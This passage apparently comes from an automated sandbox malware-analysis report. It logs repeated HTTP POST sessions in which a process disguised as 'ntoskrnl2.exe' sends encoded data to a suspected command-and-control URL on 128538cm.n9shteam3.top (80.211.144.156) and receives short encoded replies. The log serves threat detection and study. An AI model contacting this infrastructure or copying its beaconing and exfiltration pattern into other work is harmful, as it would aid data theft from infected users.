                                                            Data Ascii: PQZ_^G\T[_VZW\PXU\^HP]Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3%?;#X'&3.>=\,B8Z'<)U(W=8X=W!.%^./]+,
                                                            Sep 2, 2024 13:35:16.332412004 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:16.457170010 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            99192.168.2.64984680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:16.818592072 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:17.165730953 CEST1340OUTData Raw: 55 57 5a 55 5b 46 5c 57 5b 5f 56 5a 57 54 50 5f 55 5c 5e 42 50 5b 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZU[F\W[_VZWTP_U\^BP[Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[0&?;#\0=X32>>;/ ['%T?;(4+)1.::%^./]+
                                                            Sep 2, 2024 13:35:17.464828968 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:17.593772888 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0b 34 1a 3f 50 26 38 34 1d 2b 3a 39 02 3f 13 2c 44 3a 3f 24 10 27 00 24 03 2a 32 25 15 26 17 0f 5b 2a 5a 29 58 3f 31 22 0e 36 0e 20 5b 03 1f 25 18 23 54 31 09 24 3b 32 03 24 27 0c 5d 22 09 02 5f 3d 03 04 52 27 2d 33 04 34 22 3d 08 2f 2e 31 0e 31 01 28 5f 2f 3c 35 06 24 3e 2a 56 08 16 3b 0c 2b 02 25 04 37 34 34 04 21 38 2d 56 37 18 33 52 27 0a 37 56 33 39 39 56 33 07 33 1c 3d 2d 2b 58 27 39 0b 5d 21 33 29 50 2c 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: #4?P&84+:9?,D:?$'$*2%&[*Z)X?1"6 [%#T1$;2$']"_=R'-34"=/.11(_/<5$>*V;+%744!8-V73R'7V399V33=-+X'9]!3)P,9$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            100192.168.2.64984780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:16.840890884 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:17.197552919 CEST1028OUTData Raw: 55 50 5f 51 5b 41 59 54 5b 5f 56 5a 57 55 50 59 55 5f 5e 40 50 5a 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UP_Q[AYT[_VZWUPYU_^@PZZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3?8?02'.&\(/,#&,=S+(<T*4*2%:%^./]+
                                                            Sep 2, 2024 13:35:17.492552042 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:17.618711948 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            101192.168.2.64984880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:17.769516945 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:18.118599892 CEST1028OUTData Raw: 55 5f 5f 51 5e 48 5c 56 5b 5f 56 5a 57 54 50 5e 55 5a 5e 45 50 53 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U__Q^H\V[_VZWTP^UZ^EPSZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y3-\+ '"'X*\+/'73/)V+'=78)5-*%^./]+
                                                            Sep 2, 2024 13:35:18.417937040 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:18.541320086 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            102192.168.2.64984980.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:18.676398993 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:19.025219917 CEST1028OUTData Raw: 55 51 5f 56 5e 48 59 52 5b 5f 56 5a 57 5b 50 5b 55 5b 5e 40 50 5b 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQ_V^HYR[_VZW[P[U[^@P[ZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&!Y<4'"53-?#/4]0<+('=$$[*!):%^./]+0
                                                            Sep 2, 2024 13:35:19.343343019 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:19.473081112 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            103192.168.2.64985080.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:19.612816095 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:19.962734938 CEST1028OUTData Raw: 55 5e 5f 52 5e 48 59 57 5b 5f 56 5a 57 5a 50 58 55 59 5e 40 50 52 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^_R^HYW[_VZWZPXUY^@PRZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'2=Y(<0!%[$>&+(\-4(X'<%+(V>$(^>""/*%^./]+
                                                            Sep 2, 2024 13:35:20.259644985 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:20.385696888 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            104192.168.2.64985180.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:20.517950058 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:20.868777037 CEST1028OUTData Raw: 55 50 5f 52 5b 44 5c 56 5b 5f 56 5a 57 5b 50 5b 55 5a 5e 45 50 5f 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UP_R[D\V[_VZW[P[UZ^EP_ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z32"<8,3T*$*^<+,773<-((;*4?"&-:%^./]+0
                                                            Sep 2, 2024 13:35:21.166017056 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:21.292433023 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            105192.168.2.64985280.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:21.430224895 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:21.774853945 CEST1028OUTData Raw: 55 50 5a 50 5b 43 59 52 5b 5f 56 5a 57 54 50 58 55 58 5e 48 50 52 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UPZP[CYR[_VZWTPXUX^HPRZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$022=8;3^'-*X>=#/B7&/%S?;**=/:%^./]+
                                                            Sep 2, 2024 13:35:22.108567953 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:22.243895054 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            106192.168.2.64985380.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:22.370500088 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:22.728427887 CEST1028OUTData Raw: 50 51 5a 57 5e 43 5c 57 5b 5f 56 5a 57 5a 50 59 55 58 5e 42 50 5a 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZW^C\W[_VZWZPYUX^BPZZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'2=Y?3T9Y$6_(>#8';&<)R++8Q=')-::%^./]+
                                                            Sep 2, 2024 13:35:23.019602060 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:23.265839100 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            107192.168.2.64985480.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:22.613749981 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:22.962491989 CEST1340OUTData Raw: 55 51 5a 50 5e 45 59 56 5b 5f 56 5a 57 5f 50 5e 55 5e 5e 43 50 5d 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQZP^EYV[_VZW_P^U^^CP]Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[0W1<?_32)_3=.\?=7;4]&,>*;$)B+)"/*%^./]+
                                                            Sep 2, 2024 13:35:23.262326956 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:23.509865999 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 10 22 37 2c 08 25 02 34 13 2a 29 25 07 3c 3d 2f 1a 3a 06 2c 5a 24 39 30 01 2b 32 22 0a 24 2a 29 5b 3e 3c 07 1f 3f 22 03 54 35 1e 20 5b 03 1f 26 05 34 0c 29 08 31 38 3a 05 27 0e 21 01 35 0e 20 5b 2a 5b 2e 51 30 2e 34 5a 20 21 21 0e 3b 03 00 50 25 5e 38 12 2e 02 25 06 32 14 2a 56 08 16 3b 09 29 3c 2a 14 22 37 37 1f 23 3b 22 0d 34 18 37 51 25 33 24 0a 25 29 3d 52 33 10 27 50 28 2d 27 5c 24 5f 2e 07 37 0a 3a 0d 39 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: "7,%4*)%<=/:,Z$90+2"$*)[><?"T5 [&4)18:'!5 [*[.Q0.4Z !!;P%^8.%2*V;)<*"77#;"47Q%3$%)=R3'P(-'\$_.7:99$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            108192.168.2.64985580.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:23.397227049 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:23.748497009 CEST1028OUTData Raw: 55 57 5a 52 5e 40 59 54 5b 5f 56 5a 57 58 50 5e 55 5d 5e 42 50 5b 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZR^@YT[_VZWXP^U]^BP[ZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'_31X?\029[0>2]<+;B;&,S(+ >$?!!/*%^./]+<
                                                            Sep 2, 2024 13:35:24.059585094 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:24.186649084 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            109192.168.2.64985780.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:24.309830904 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:24.668350935 CEST1024OUTData Raw: 55 56 5a 5e 5e 46 59 52 5b 5f 56 5a 57 5d 50 59 55 5a 5e 41 50 5d 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UVZ^^FYR[_VZW]PYUZ^AP]ZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y&!%X+8/\'2Y$>2?[<_,$,%V(;;('#*!9:%^./]+$
                                                            Sep 2, 2024 13:35:24.957202911 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:25.164572001 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            110192.168.2.64985880.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:25.316030025 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:25.665497065 CEST1028OUTData Raw: 55 54 5a 52 5e 42 59 56 5b 5f 56 5a 57 5a 50 53 55 5c 5e 49 50 5e 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZR^BYV[_VZWZPSU\^IP^Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!.(;^$0:?-(^,$?'<%U+;<P>=!/*%^./]+
                                                            Sep 2, 2024 13:35:25.988614082 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:26.117064953 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            111192.168.2.64985980.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:26.247383118 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:26.613190889 CEST1028OUTData Raw: 50 52 5a 55 5e 40 59 56 5b 5f 56 5a 57 54 50 5c 55 5e 5e 41 50 5e 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZU^@YV[_VZWTP\U^^AP^ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$2!(+?'2:3>+-#,<[3**8#>$4Z?2!9%^./]+
                                                            Sep 2, 2024 13:35:26.892215014 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:27.017081022 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            112192.168.2.64986080.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:27.141866922 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:27.493630886 CEST1028OUTData Raw: 50 52 5f 54 5e 42 59 53 5b 5f 56 5a 57 5b 50 58 55 5e 5e 49 50 52 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
